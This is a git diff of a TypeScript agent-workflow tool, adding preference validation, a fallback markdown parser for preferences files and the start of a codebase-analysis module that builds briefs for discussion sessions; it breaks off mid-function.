-      const knownReKeys = new Set(["enabled", "max_parallel", "isolation_mode"]);
+      if (re.subagent_model !== undefined) {
+        if (typeof re.subagent_model === "string" && re.subagent_model.length > 0) {
+          validRe.subagent_model = re.subagent_model;
+        } else {
+          errors.push("reactive_execution.subagent_model must be a non-empty string");
+        }
+      }
+
+      const knownReKeys = new Set(["enabled", "max_parallel", "isolation_mode", "subagent_model"]);
       for (const key of Object.keys(re)) {
         if (!knownReKeys.has(key)) {
           warnings.push(`unknown reactive_execution key "${key}" — ignored`);
@@ -538,6 +592,43 @@ export function validatePreferences(preferences: GSDPreferences): {
     }
   }
 
+  // ─── Gate Evaluation ─────────────────────────────────────────────────────
+  if (preferences.gate_evaluation !== undefined) {
+    if (typeof preferences.gate_evaluation === "object" && preferences.gate_evaluation !== null) {
+      const ge = preferences.gate_evaluation as unknown as Record<string, unknown>;
+      const validGe: Record<string, unknown> = {};
+
+      if (ge.enabled !== undefined) {
+        if (typeof ge.enabled === "boolean") validGe.enabled = ge.enabled;
+        else errors.push("gate_evaluation.enabled must be a boolean");
+      }
+      if (ge.slice_gates !== undefined) {
+        if (Array.isArray(ge.slice_gates) && ge.slice_gates.every((g: unknown) => typeof g === "string")) {
+          validGe.slice_gates = ge.slice_gates;
+        } else {
+          errors.push("gate_evaluation.slice_gates must be an array of strings");
+        }
+      }
+      if (ge.task_gates !== undefined) {
+        if (typeof ge.task_gates === "boolean") validGe.task_gates = ge.task_gates;
+        else errors.push("gate_evaluation.task_gates must be a boolean");
+      }
+
+      const knownGeKeys = new Set(["enabled", "slice_gates", "task_gates"]);
+      for (const key of Object.keys(ge)) {
+        if (!knownGeKeys.has(key)) {
+          warnings.push(`unknown gate_evaluation key "${key}" — ignored`);
+        }
+      }
+
+      if (Object.keys(validGe).length > 0) {
+        validated.gate_evaluation = validGe as unknown as import("./types.js").GateEvaluationConfig;
+      }
+    } else {
+      errors.push("gate_evaluation must be an object");
+    }
+  }
+
   // ─── Verification Preferences ───────────────────────────────────────────
   if (preferences.verification_commands !== undefined) {
     if (Array.isArray(preferences.verification_commands)) {
@@ -747,5 +838,146 @@ export function validatePreferences(preferences: GSDPreferences): {
     }
   }
 
+  // ─── Show Token Cost ──────────────────────────────────────────────
+  if (preferences.show_token_cost !== undefined) {
+    if (typeof preferences.show_token_cost === "boolean") {
+      validated.show_token_cost = preferences.show_token_cost;
+    } else {
+      errors.push("show_token_cost must be a boolean");
+    }
+  }
+
+  // ─── Experimental Features ────────────────────────────────────────
+  if (preferences.experimental !== undefined) {
+    if (typeof preferences.experimental === "object" && preferences.experimental !== null) {
+      const exp = preferences.experimental as unknown as Record<string, unknown>;
+      const validExp: import("./preferences-types.js").ExperimentalPreferences = {};
+
+      if (exp.rtk !== undefined) {
+        if (typeof exp.rtk === "boolean") validExp.rtk = exp.rtk;
+        else errors.push("experimental.rtk must be a boolean");
+      }
+
+      const knownExpKeys = new Set(["rtk"]);
+      for (const key of Object.keys(exp)) {
+        if (!knownExpKeys.has(key)) {
+          warnings.push(`unknown experimental key "${key}" — ignored`);
+        }
+      }
+
+      if (Object.keys(validExp).length > 0) {
+        validated.experimental = validExp;
+      }
+    } else {
+      errors.push("experimental must be an object");
+    }
+  }
+
+  // ─── Codebase Map ──────────────────────────────────────────────────
+  if (preferences.codebase !== undefined) {
+    if (typeof preferences.codebase === "object" && preferences.codebase !== null) {
+      const cb = preferences.codebase as Record<string, unknown>;
+      const validCb: import("./preferences-types.js").CodebaseMapPreferences = {};
+
+      if (cb.exclude_patterns !== undefined) {
+        if (Array.isArray(cb.exclude_patterns) && cb.exclude_patterns.every((p: unknown) => typeof p === "string")) {
+          validCb.exclude_patterns = cb.exclude_patterns as string[];
+        } else {
+          errors.push("codebase.exclude_patterns must be an array of strings");
+        }
+      }
+      if (cb.max_files !== undefined) {
+        const mf = typeof cb.max_files === "number" ? cb.max_files : Number(cb.max_files);
+        if (Number.isFinite(mf) && mf >= 1) {
+          validCb.max_files = Math.floor(mf);
+        } else {
+          errors.push("codebase.max_files must be a positive integer");
+        }
+      }
+      if (cb.collapse_threshold !== undefined) {
+        const ct = typeof cb.collapse_threshold === "number" ? cb.collapse_threshold : Number(cb.collapse_threshold);
+        if (Number.isFinite(ct) && ct >= 1) {
+          validCb.collapse_threshold = Math.floor(ct);
+        } else {
+          errors.push("codebase.collapse_threshold must be a positive integer");
+        }
+      }
+
+      const knownCbKeys = new Set(["exclude_patterns", "max_files", "collapse_threshold"]);
+      for (const key of Object.keys(cb)) {
+        if (!knownCbKeys.has(key)) {
+          warnings.push(`unknown codebase key "${key}" — ignored`);
+        }
+      }
+
+      if (Object.keys(validCb).length > 0) {
+        validated.codebase = validCb;
+      }
+    } else {
+      errors.push("codebase must be an object");
+    }
+  }
+
+  // ─── Enhanced Verification ──────────────────────────────────────────────────
+  if (preferences.enhanced_verification !== undefined) {
+    if (typeof preferences.enhanced_verification === "boolean") {
+      validated.enhanced_verification = preferences.enhanced_verification;
+    } else {
+      errors.push("enhanced_verification must be a boolean");
+    }
+  }
+
+  if (preferences.enhanced_verification_pre !== undefined) {
+    if (typeof preferences.enhanced_verification_pre === "boolean") {
+      validated.enhanced_verification_pre = preferences.enhanced_verification_pre;
+    } else {
+      errors.push("enhanced_verification_pre must be a boolean");
+    }
+  }
+
+  if (preferences.enhanced_verification_post !== undefined) {
+    if (typeof preferences.enhanced_verification_post === "boolean") {
+      validated.enhanced_verification_post = preferences.enhanced_verification_post;
+    } else {
+      errors.push("enhanced_verification_post must be a boolean");
+    }
+  }
+
+  if (preferences.enhanced_verification_strict !== undefined) {
+    if (typeof preferences.enhanced_verification_strict === "boolean") {
+      validated.enhanced_verification_strict = preferences.enhanced_verification_strict;
+    } else {
+      errors.push("enhanced_verification_strict must be a boolean");
+    }
+  }
+
+  // ─── Discuss Preparation ────────────────────────────────────────────
+  if (preferences.discuss_preparation !== undefined) {
+    if (typeof preferences.discuss_preparation === "boolean") {
+      validated.discuss_preparation = preferences.discuss_preparation;
+    } else {
+      errors.push("discuss_preparation must be a boolean");
+    }
+  }
+
+  // ─── Discuss Web Research ───────────────────────────────────────────
+  if (preferences.discuss_web_research !== undefined) {
+    if (typeof preferences.discuss_web_research === "boolean") {
+      validated.discuss_web_research = preferences.discuss_web_research;
+    } else {
+      errors.push("discuss_web_research must be a boolean");
+    }
+  }
+
+  // ─── Discuss Depth ──────────────────────────────────────────────────
+  if (preferences.discuss_depth !== undefined) {
+    const validDepths = new Set(["quick", "standard", "thorough"]);
+    if (typeof preferences.discuss_depth === "string" && validDepths.has(preferences.discuss_depth)) {
+      validated.discuss_depth = preferences.discuss_depth as GSDPreferences["discuss_depth"];
+    } else {
+      errors.push(`discuss_depth must be one of: quick, standard, thorough`);
+    }
+  }
+
   return { preferences: validated, errors, warnings };
 }
diff --git a/src/resources/extensions/gsd/preferences.ts b/src/resources/extensions/gsd/preferences.ts
index e369525cc..a2c86fdbd 100644
--- a/src/resources/extensions/gsd/preferences.ts
+++ b/src/resources/extensions/gsd/preferences.ts
@@ -19,9 +19,11 @@ import { parse as parseYaml } from "yaml";
 import type { PostUnitHookConfig, PreDispatchHookConfig, TokenProfile } from "./types.js";
 import type { DynamicRoutingConfig } from "./model-router.js";
 import { normalizeStringArray } from "../shared/format-utils.js";
+import { logWarning } from "./workflow-logger.js";
 import { resolveProfileDefaults as _resolveProfileDefaults } from "./preferences-models.js";
 
 import {
+  KNOWN_PREFERENCE_KEYS,
   MODE_DEFAULTS,
   type WorkflowMode,
   type GSDPreferences,
@@ -47,6 +49,7 @@ export type {
   AutoSupervisorConfig,
   RemoteQuestionsConfig,
   CmuxPreferences,
+  CodebaseMapPreferences,
   GSDPreferences,
   LoadedGSDPreferences,
   SkillResolution,
@@ -196,18 +199,46 @@ function loadPreferencesFile(path: string, scope: "global" | "project"): LoadedG
   };
 }
 
+let _warnedUnrecognizedFormat = false;
+let _warnedSectionParse = false;
+
+/** @internal Reset the warn-once flags — exported for testing only. */
+export function _resetParseWarningFlag(): void {
+  _warnedUnrecognizedFormat = false;
+  _warnedFrontmatterParse = false;
+  _warnedSectionParse = false;
+}
+
 /** @internal Exported for testing only */
 export function parsePreferencesMarkdown(content: string): GSDPreferences | null {
   // Use indexOf instead of [\s\S]*? regex to avoid backtracking (#468)
   const startMarker = content.startsWith('---\r\n') ? '---\r\n' : '---\n';
-  if (!content.startsWith(startMarker)) return null;
-  const searchStart = startMarker.length;
-  const endIdx = content.indexOf('\n---', searchStart);
-  if (endIdx === -1) return null;
-  const block = content.slice(searchStart, endIdx);
-  return parseFrontmatterBlock(block.replace(/\r/g, ''));
+  if (content.startsWith(startMarker)) {
+    const searchStart = startMarker.length;
+    const endIdx = content.indexOf('\n---', searchStart);
+    if (endIdx === -1) return null;
+    const block = content.slice(searchStart, endIdx);
+    return parseFrontmatterBlock(block.replace(/\r/g, ''));
+  }
+
+  // Fallback: heading+list format (e.g. "## Git\n- isolation: none") (#2036)
+  // GSD agents may write preferences files without frontmatter delimiters.
+  if (/^##\s+\w/m.test(content)) {
+    return parseHeadingListFormat(content);
+  }
+
+  // Warn when a non-empty file exists but lacks frontmatter delimiters (#2036).
+  if (content.trim().length > 0 && !_warnedUnrecognizedFormat) {
+    _warnedUnrecognizedFormat = true;
+    console.warn(
+      "[GSD] Warning: preferences file has unrecognized format — content does not use YAML frontmatter delimiters (---). " +
+      "Wrap your preferences in --- fences. See https://github.com/gsd-build/gsd-2/issues/2036",
+    );
+  }
+  return null;
 }
 
+let _warnedFrontmatterParse = false;
 function parseFrontmatterBlock(frontmatter: string): GSDPreferences {
   try {
     const parsed = parseYaml(frontmatter);
@@ -216,11 +247,80 @@ function parseFrontmatterBlock(frontmatter: string): GSDPreferences {
     }
     return parsed as GSDPreferences;
   } catch (e) {
-    console.error("[parseFrontmatterBlock] YAML parse error:", e);
+    // Warn at most once per session to avoid flooding TUI (#3376)
+    if (!_warnedFrontmatterParse) {
+      _warnedFrontmatterParse = true;
+      logWarning("guided", `YAML parse error in preferences frontmatter (suppressing further): ${(e as Error).message}`);
+    }
     return {} as GSDPreferences;
   }
 }
 
+/**
+ * Parse heading+list format into a nested object, then cast to GSDPreferences.
+ * Handles markdown like:
+ *   ## Git
+ *   - isolation: none
+ *   - commit_docs: true
+ *   ## Models
+ *   - planner: sonnet
+ */
+function parseHeadingListFormat(content: string): GSDPreferences {
+  const result: Record<string, string[]> = {};
+  let currentSection: string | null = null;
+
+  for (const rawLine of content.split('\n')) {
+    const line = rawLine.replace(/\r$/, '');
+    const headingMatch = line.match(/^##\s+(.+)$/);
+    if (headingMatch) {
+      currentSection = headingMatch[1].trim().toLowerCase().replace(/\s+/g, '_');
+      if (!result[currentSection]) result[currentSection] = [];
+      continue;
+    }
+    if (currentSection && line.trim() && !line.trimStart().startsWith('#')) {
+      result[currentSection].push(line);
+    }
+  }
+
+  const typed: Record<string, unknown> = {};
+  for (const [section, lines] of Object.entries(result)) {
+    if (lines.length === 0) continue;
+
+    const usesLegacyListItems = lines.every((line) => /^\s*-\s+[^:]+:\s*.*$/.test(line));
+    const yamlBlock = usesLegacyListItems
+      ? lines.map((line) => line.replace(/^\s*-\s+/, '')).join('\n')
+      : lines.join('\n');
+
+    try {
+      const parsed = parseYaml(yamlBlock);
+      if (typeof parsed !== 'object' || parsed === null) continue;
+
+      let targetSection = section;
+      let value: unknown = parsed;
+
+      if (!Array.isArray(parsed)) {
+        const keys = Object.keys(parsed);
+        if (keys.length === 1) {
+          const [onlyKey] = keys;
+          if (onlyKey === section || (!KNOWN_PREFERENCE_KEYS.has(section) && KNOWN_PREFERENCE_KEYS.has(onlyKey))) {
+            targetSection = onlyKey;
+            value = (parsed as Record<string, unknown>)[onlyKey];
+          }
+        }
+      }
+
+      typed[targetSection] = value;
+    } catch (e) {
+      if (!_warnedSectionParse) {
+        _warnedSectionParse = true;
+        logWarning("guided", `preferences section parse failed: ${(e as Error).message}`);
+      }
+    }
+  }
+
+  return typed as GSDPreferences;
+}
+
 // ─── Merging ────────────────────────────────────────────────────────────────
 
 /**
@@ -278,6 +378,10 @@ function mergePreferences(base: GSDPreferences, override: GSDPreferences): GSDPr
     verification_commands: mergeStringLists(base.verification_commands, override.verification_commands),
     verification_auto_fix: override.verification_auto_fix ?? base.verification_auto_fix,
     verification_max_retries: override.verification_max_retries ?? base.verification_max_retries,
+    enhanced_verification: override.enhanced_verification ?? base.enhanced_verification,
+    enhanced_verification_pre: override.enhanced_verification_pre ?? base.enhanced_verification_pre,
+    enhanced_verification_post: override.enhanced_verification_post ?? base.enhanced_verification_post,
+    enhanced_verification_strict: override.enhanced_verification_strict ?? base.enhanced_verification_strict,
     search_provider: override.search_provider ?? base.search_provider,
     context_selection: override.context_selection ?? base.context_selection,
     auto_visualize: override.auto_visualize ?? base.auto_visualize,
@@ -286,6 +390,22 @@ function mergePreferences(base: GSDPreferences, override: GSDPreferences): GSDPr
       ? { ...(base.github ?? {}), ...(override.github ?? {}) } as import("../github-sync/types.js").GitHubSyncConfig
       : undefined,
     service_tier: override.service_tier ?? base.service_tier,
+    forensics_dedup: override.forensics_dedup ?? base.forensics_dedup,
+    show_token_cost: override.show_token_cost ?? base.show_token_cost,
+    codebase: (base.codebase || override.codebase)
+      ? {
+          ...(base.codebase ?? {}),
+          ...(override.codebase ?? {}),
+          // Merge exclude_patterns arrays rather than overriding
+          exclude_patterns: [
+            ...((base.codebase?.exclude_patterns) ?? []),
+            ...((override.codebase?.exclude_patterns) ?? []),
+          ].filter(Boolean),
+        }
+      : undefined,
+    slice_parallel: (base.slice_parallel || override.slice_parallel)
+      ? { ...(base.slice_parallel ?? {}), ...(override.slice_parallel ?? {}) }
+      : undefined,
   };
 }
 
@@ -430,13 +550,17 @@ export function resolvePreDispatchHooks(): PreDispatchHookConfig[] {
 
 /**
  * Resolve the effective git isolation mode from preferences.
- * Returns "worktree" (default), "branch", or "none".
+ * Returns "none" (default), "worktree", or "branch".
+ *
+ * Default is "none" so GSD works out of the box without preferences.md.
+ * Worktree isolation requires explicit opt-in because it depends on git
+ * branch infrastructure that must be set up before use.
  */
 export function getIsolationMode(): "none" | "worktree" | "branch" {
   const prefs = loadEffectiveGSDPreferences()?.preferences?.git;
-  if (prefs?.isolation === "none") return "none";
+  if (prefs?.isolation === "worktree") return "worktree";
   if (prefs?.isolation === "branch") return "branch";
-  return "worktree"; // default
+  return "none"; // default — no isolation, work on current branch
 }
 
 export function resolveParallelConfig(prefs: GSDPreferences | undefined): import("./types.js").ParallelConfig {
@@ -446,5 +570,6 @@ export function resolveParallelConfig(prefs: GSDPreferences | undefined): import
     budget_ceiling: prefs?.parallel?.budget_ceiling,
     merge_strategy: prefs?.parallel?.merge_strategy ?? "per-milestone",
     auto_merge: prefs?.parallel?.auto_merge ?? "confirm",
+    worker_model: prefs?.parallel?.worker_model,
   };
 }
diff --git a/src/resources/extensions/gsd/preparation.ts b/src/resources/extensions/gsd/preparation.ts
new file mode 100644
index 000000000..0983eb18f
--- /dev/null
+++ b/src/resources/extensions/gsd/preparation.ts
@@ -0,0 +1,1419 @@
+/**
+ * GSD Preparation — Structured brief generation for discussion LLM sessions.
+ *
+ * Produces structured briefs (codebase, prior context, ecosystem) before
+ * the discussion LLM session starts.
+ *
+ * Pure functions, zero UI dependencies (except for runPreparation orchestrator).
+ */
+
+import { readdirSync, readFileSync, statSync, openSync, readSync, closeSync } from "node:fs";
+import { join, relative } from "node:path";
+import { readdirSync as readdirSyncNode } from "node:fs";
+import {
+  detectProjectSignals,
+  scanProjectFiles,
+  PROJECT_FILES,
+  type ProjectSignals,
+} from "./detection.js";
+import { loadFile } from "./files.js";
+
+// ─── Types ──────────────────────────────────────────────────────────────────────
+
+/** Detected patterns in the codebase. */
+export interface CodePatterns {
+  /** Primary async style: "async/await" | "callbacks" | "promises" | "mixed" */
+  asyncStyle: "async/await" | "callbacks" | "promises" | "mixed" | "unknown";
+  /** Primary error handling: "try/catch" | "error-callbacks" | "result-types" | "mixed" */
+  errorHandling: "try/catch" | "error-callbacks" | "result-types" | "mixed" | "unknown";
+  /** Primary naming convention: "camelCase" | "snake_case" | "PascalCase" | "mixed" */
+  namingConvention: "camelCase" | "snake_case" | "PascalCase" | "mixed" | "unknown";
+  /** Sample evidence strings for each pattern (for debugging/transparency) */
+  evidence: {
+    asyncStyle: string[];
+    errorHandling: string[];
+    namingConvention: string[];
+  };
+  /** File counts for each pattern type (for formatted output) */
+  fileCounts: {
+    asyncAwait: number;
+    promises: number;
+    callbacks: number;
+    tryCatch: number;
+    errorCallbacks: number;
+    resultTypes: number;
+  };
+}
+
+/** Language-specific pattern detection configuration. */
+export interface LanguagePatternEntry {
+  /** Display name for the language (e.g., "JavaScript/TypeScript") */
+  displayName: string;
+  /** File extensions to sample for this language */
+  extensions: string[];
+  /** Async style detection patterns */
+  asyncStyle: {
+    modern: RegExp;
+    modernLabel: string;
+    legacy: RegExp;
+    legacyLabel: string;
+  };
+  /** Error handling detection patterns */
+  errorHandling: {
+    structured: RegExp;
+    structuredLabel: string;
+    inline: RegExp;
+    inlineLabel: string;
+  };
+}
+
+/** Module structure detected in the codebase. */
+export interface ModuleStructure {
+  /** Top-level directories found (e.g., ["src", "lib", "test"]) */
+  topLevelDirs: string[];
+  /** Subdirectories within src/ or lib/ (e.g., ["components", "utils", "hooks"]) */
+  srcSubdirs: string[];
+  /** Total file count sampled */
+  totalFilesSampled: number;
+}
+
+/** A single decision entry parsed from DECISIONS.md. */
+export interface DecisionEntry {
+  id: string;
+  scope: string;
+  decision: string;
+  choice: string;
+  rationale: string;
+}
+
+/** A single requirement entry parsed from REQUIREMENTS.md. */
+export interface RequirementEntry {
+  id: string;
+  description: string;
+  status: "active" | "validated" | "deferred" | "out-of-scope";
+}
+
+/** Prior context brief aggregated from GSD artifacts. */
+export interface PriorContextBrief {
+  /** Decisions grouped by scope. */
+  decisions: {
+    byScope: Map<string, DecisionEntry[]>;
+    totalCount: number;
+  };
+  /** Requirements grouped by status. */
+  requirements: {
+    active: RequirementEntry[];
+    validated: RequirementEntry[];
+    deferred: RequirementEntry[];
+    totalCount: number;
+  };
+  /** Knowledge entries (raw content, truncated). */
+  knowledge: string;
+  /** Prior milestone summaries (combined, truncated). */
+  summaries: string;
+}
+
+/** Codebase analysis brief. */
+export interface CodebaseBrief {
+  /** Tech stack and language from detectProjectSignals */
+  techStack: {
+    primaryLanguage?: string;
+    detectedFiles: string[];
+    packageManager?: string;
+    isMonorepo: boolean;
+    hasTests: boolean;
+    hasCI: boolean;
+  };
+  /** Module structure */
+  moduleStructure: ModuleStructure;
+  /** Detected code patterns */
+  patterns: CodePatterns;
+  /** Source files that were sampled for pattern extraction */
+  sampledFiles: string[];
+}
+
+/** A single ecosystem research finding. */
+export interface EcosystemFinding {
+  /** Query that produced this finding */
+  query: string;
+  /** Title or snippet from search result */
+  title: string;
+  /** URL source */
+  url?: string;
+  /** Brief content snippet */
+  snippet: string;
+}
+
+/** Ecosystem research brief from web search. */
+export interface EcosystemBrief {
+  /** Whether ecosystem research was performed */
+  available: boolean;
+  /** Search queries that were executed */
+  queries: string[];
+  /** Aggregated findings from search results */
+  findings: EcosystemFinding[];
+  /** Reason why research was skipped (if available === false) */
+  skippedReason?: string;
+  /** Which search provider was used */
+  provider?: string;
+}
+
+// ─── Constants ──────────────────────────────────────────────────────────────────
+
+/** Maximum characters for the codebase section. */
+const MAX_CODEBASE_BRIEF_CHARS = 3000;
+
+/** Number of files to sample for pattern extraction. */
+const SAMPLE_FILE_COUNT = 5;
+
+/** Maximum bytes to read from each sampled file. */
+const MAX_FILE_SAMPLE_BYTES = 8192;
+
+/** Directories to skip when sampling. */
+const SKIP_DIRS = new Set([
+  "node_modules",
+  "dist",
+  "build",
+  ".git",
+  "coverage",
+  ".next",
+  ".nuxt",
+  "target",
+  ".turbo",
+  "vendor",
+  "__pycache__",
+  ".venv",
+  "venv",
+]);
+
+/** File patterns to exclude when sampling. */
+const EXCLUDE_PATTERNS = [
+  /\.test\.(ts|tsx|js|jsx|mjs|cjs)$/,
+  /\.spec\.(ts|tsx|js|jsx|mjs|cjs)$/,
+  /\.d\.ts$/,
+  /test-.*\.(ts|tsx|js|jsx)$/,
+  /.*\.min\.(js|css)$/,
+];
+
+/** File extensions to sample for pattern extraction (JS/TS default). */
+const SAMPLE_EXTENSIONS = [".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"];
+
+/** Common source file extensions for universal pattern detection (naming convention).
+ *  Used when the language is not in LANGUAGE_PATTERNS but we still want to detect camelCase/snake_case. */
+const UNIVERSAL_SOURCE_EXTENSIONS = [
+  // JavaScript/TypeScript
+  ".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs",
+  // Python
+  ".py", ".pyw", ".pyi",
+  // Ruby
+  ".rb", ".rake", ".gemspec",
+  // Go
+  ".go",
+  // Rust
+  ".rs",
+  // Java/Kotlin
+  ".java", ".kt", ".kts",
+  // C/C++
+  ".c", ".cpp", ".cc", ".cxx", ".h", ".hpp",
+  // C#
+  ".cs",
+  // Swift
+  ".swift",
+  // PHP
+  ".php",
+  // Scala
+  ".scala",
+  // Elixir/Erlang
+  ".ex", ".exs", ".erl",
+  // Haskell
+  ".hs", ".lhs",
+  // Shell
+  ".sh", ".bash", ".zsh",
+  // Lua
+  ".lua",
+  // Dart
+  ".dart",
+];
+
+// ─── Pattern Detection Regexes ──────────────────────────────────────────────────
+
+/** Async/await usage patterns. */
+const ASYNC_AWAIT_RE = /\basync\s+function\b|\basync\s*\(|\bawait\s+/g;
+
+/** Callback-style patterns (common patterns like done, callback, cb). */
+const CALLBACK_RE = /\b(callback|cb|done)\s*\(|\bfunction\s*\([^)]*\bfunction\b/g;
+
+/** Promise patterns (.then, .catch, new Promise). */
+const PROMISE_RE = /\.then\s*\(|\.catch\s*\(|\bnew\s+Promise\s*\(/g;
+
+/** Try/catch patterns. */
+const TRY_CATCH_RE = /\btry\s*\{[\s\S]*?\bcatch\s*\(/g;
+
+/** Error-first callback patterns. */
+const ERROR_CALLBACK_RE = /\bif\s*\(\s*(err|error)\s*\)|\(err(or)?\s*,/g;
+
+/** Result type patterns (Rust-style, fp-ts, etc.). */
+const RESULT_TYPE_RE = /\bResult<|\bEither<|\bisOk\(|\bisErr\(|\b(Ok|Err)\(/g;
+
+/** camelCase identifier patterns. */
+const CAMEL_CASE_RE = /\b[a-z][a-zA-Z0-9]*[A-Z][a-zA-Z0-9]*\b/g;
+
+/** snake_case identifier patterns. */
+const SNAKE_CASE_RE = /\b[a-z][a-z0-9]*_[a-z0-9_]+\b/g;
+
+/** PascalCase identifier patterns (for types/classes). */
+const PASCAL_CASE_RE = /\bclass\s+[A-Z][a-zA-Z0-9]*|\binterface\s+[A-Z][a-zA-Z0-9]*|\btype\s+[A-Z][a-zA-Z0-9]*/g;
+
+// ─── Language Pattern Registry ──────────────────────────────────────────────────
+
+/**
+ * Registry of language-specific patterns for code analysis.
+ * Keys MUST match detection.ts LANGUAGE_MAP values exactly.
+ */
+export const LANGUAGE_PATTERNS: Record<string, LanguagePatternEntry> = {
+  "javascript/typescript": {
+    displayName: "JavaScript/TypeScript",
+    extensions: [".ts", ".tsx", ".js", ".jsx", ".mjs", ".cjs"],
+    asyncStyle: {
+      modern: /\basync\s+function\b|\basync\s*\(|\bawait\s+/g,
+      modernLabel: "async/await",
+      legacy: /\.then\s*\(|\.catch\s*\(|\bnew\s+Promise\s*\(/g,
+      legacyLabel: "promises",
+    },
+    errorHandling: {
+      structured: /\btry\s*\{[\s\S]*?\bcatch\s*\(/g,
+      structuredLabel: "try/catch",
+      inline: /\bif\s*\(\s*(err|error)\s*\)|\(err(or)?\s*,/g,
+      inlineLabel: "error-callbacks",
+    },
+  },
+  python: {
+    displayName: "Python",
+    extensions: [".py", ".pyw", ".pyi"],
+    asyncStyle: {
+      modern: /\basync\s+def\b|\bawait\s+/g,
+      modernLabel: "async/await",
+      legacy: /\.add_done_callback\(|ThreadPoolExecutor|ProcessPoolExecutor/g,
+      legacyLabel: "futures/executors",
+    },
+    errorHandling: {
+      structured: /\btry\s*:[\s\S]*?\bexcept\b/g,
+      structuredLabel: "try/except",
+      inline: /\braise\s+\w+Error|\bassert\s+/g,
+      inlineLabel: "raise/assert",
+    },
+  },
+  rust: {
+    displayName: "Rust",
+    extensions: [".rs"],
+    asyncStyle: {
+      modern: /\basync\s+fn\b|\.await\b/g,
+      modernLabel: "async/await",
+      legacy: /\bthread::spawn\(|\bmpsc::/g,
+      legacyLabel: "threads/channels",
+    },
+    errorHandling: {
+      structured: /\bResult<|\bOption<|\?\s*;/g,
+      structuredLabel: "Result/Option",
+      inline: /\bunwrap\(\)|\bexpect\(/g,
+      inlineLabel: "unwrap/expect",
+    },
+  },
+  go: {
+    displayName: "Go",
+    extensions: [".go"],
+    asyncStyle: {
+      modern: /\bgo\s+func\b|\bgo\s+\w+\(/g,
+      modernLabel: "goroutines",
+      legacy: /\bchan\s+\w+|<-\s*\w+|\w+\s*<-/g,
+      legacyLabel: "channels",
+    },
+    errorHandling: {
+      structured: /\bif\s+err\s*!=\s*nil\b/g,
+      structuredLabel: "if err != nil",
+      inline: /\bpanic\(|\brecover\(\)/g,
+      inlineLabel: "panic/recover",
+    },
+  },
+  java: {
+    displayName: "Java",
+    extensions: [".java"],
+    asyncStyle: {
+      modern: /\bCompletableFuture<|\bCompletionStage<|\bthenApply\(/g,
+      modernLabel: "CompletableFuture",
+      legacy: /\bThread\s+\w+\s*=|\bnew\s+Thread\(|\bExecutorService\b/g,
+      legacyLabel: "threads/executors",
+    },
+    errorHandling: {
+      structured: /\btry\s*\{[\s\S]*?\bcatch\s*\(/g,
+      structuredLabel: "try/catch",
+      inline: /\bthrows\s+\w+Exception|\bthrow\s+new\s+\w+Exception/g,
+      inlineLabel: "throws/throw",
+    },
+  },
+  "java/kotlin": {
+    displayName: "Java/Kotlin",
+    extensions: [".java", ".kt", ".kts"],
+    asyncStyle: {
+      modern: /\bsuspend\s+fun\b|\blaunch\s*\{|\basync\s*\{|\bwithContext\(/g,
+      modernLabel: "coroutines",
+      legacy: /\bThread\s+\w+\s*=|\bnew\s+Thread\(|\bExecutorService\b|\bCompletableFuture</g,
+      legacyLabel: "threads/futures",
+    },
+    errorHandling: {
+      structured: /\btry\s*\{[\s\S]*?\bcatch\s*\(/g,
+      structuredLabel: "try/catch",
+      inline: /\bthrows\s+\w+Exception|\bthrow\s+\w+Exception|\brunCatching\s*\{/g,
+      inlineLabel: "throws/runCatching",
+    },
+  },
+};
+
+// ─── Core Functions ─────────────────────────────────────────────────────────────
+
+/**
+ * Analyze the codebase and produce a structured brief.
+ *
+ * @param basePath - Root directory of the project
+ * @returns CodebaseBrief with tech stack, module structure, and patterns
+ */
+export async function analyzeCodebase(basePath: string): Promise<CodebaseBrief> {
+  // Get project signals from detection.ts
+  const signals = detectProjectSignals(basePath);
+
+  // Detect module structure
+  const moduleStructure = detectModuleStructure(basePath);
+
+  // Sample files and extract patterns, passing primary language for language-aware detection
+  const sampledFiles = sampleSourceFiles(basePath, signals.primaryLanguage);
+  const patterns = extractPatterns(basePath, sampledFiles, signals.primaryLanguage);
+
+  return {
+    techStack: {
+      primaryLanguage: signals.primaryLanguage,
+      detectedFiles: signals.detectedFiles,
+      packageManager: signals.packageManager,
+      isMonorepo: signals.isMonorepo,
+      hasTests: signals.hasTests,
+      hasCI: signals.hasCI,
+    },
+    moduleStructure,
+    patterns,
+    sampledFiles,
+  };
+}
+
+/**
+ * Detect the module structure of the codebase.
+ *
+ * @param basePath - Root directory of the project
+ * @returns ModuleStructure with top-level and src subdirs
+ */
+function detectModuleStructure(basePath: string): ModuleStructure {
+  const topLevelDirs: string[] = [];
+  const srcSubdirs: string[] = [];
+
+  try {
+    const entries = readdirSync(basePath, { withFileTypes: true });
+    for (const entry of entries) {
+      if (entry.isDirectory() && !entry.name.startsWith(".") && !SKIP_DIRS.has(entry.name)) {
+        topLevelDirs.push(entry.name);
+      }
+    }
+  } catch {
+    // Directory not readable
+  }
+
+  // Scan for subdirs in src/ or lib/
+  for (const srcDir of ["src", "lib", "app"]) {
+    const srcPath = join(basePath, srcDir);
+    try {
+      const entries = readdirSync(srcPath, { withFileTypes: true });
+      for (const entry of entries) {
+        if (entry.isDirectory() && !entry.name.startsWith(".") && !SKIP_DIRS.has(entry.name)) {
+          srcSubdirs.push(entry.name);
+        }
+      }
+    } catch {
+      // Directory doesn't exist or not readable
+    }
+  }
+
+  return {
+    topLevelDirs,
+    srcSubdirs: [...new Set(srcSubdirs)], // Dedupe
+    totalFilesSampled: 0, // Will be set after sampling
+  };
+}
+
+/**
+ * Sample source files from the codebase for pattern extraction.
+ *
+ * Prefers files in src/ directory, excludes test files and node_modules.
+ * Extension selection:
+ * - If language is in LANGUAGE_PATTERNS: use language-specific extensions
+ * - If language is undefined (no manifest): use JS/TS defaults (common case)
+ * - If language is set but not in LANGUAGE_PATTERNS: use UNIVERSAL_SOURCE_EXTENSIONS
+ *   so we can still detect naming conventions even for unrecognized languages
+ *
+ * @param basePath - Root directory of the project
+ * @param primaryLanguage - Optional primary language identifier from detection.ts LANGUAGE_MAP
+ * @returns Array of relative file paths to sampled files
+ */
+function sampleSourceFiles(basePath: string, primaryLanguage?: string): string[] {
+  // Use scanProjectFiles from detection.ts for bounded recursion
+  const allFiles = scanProjectFiles(basePath);
+
+  // Get extensions to sample based on language detection status
+  const languageEntry = primaryLanguage ? LANGUAGE_PATTERNS[primaryLanguage] : undefined;
+  let extensionsToSample: string[];
+  
+  if (languageEntry) {
+    // Language is in registry — use its specific extensions
+    extensionsToSample = languageEntry.extensions;
+  } else if (primaryLanguage === undefined) {
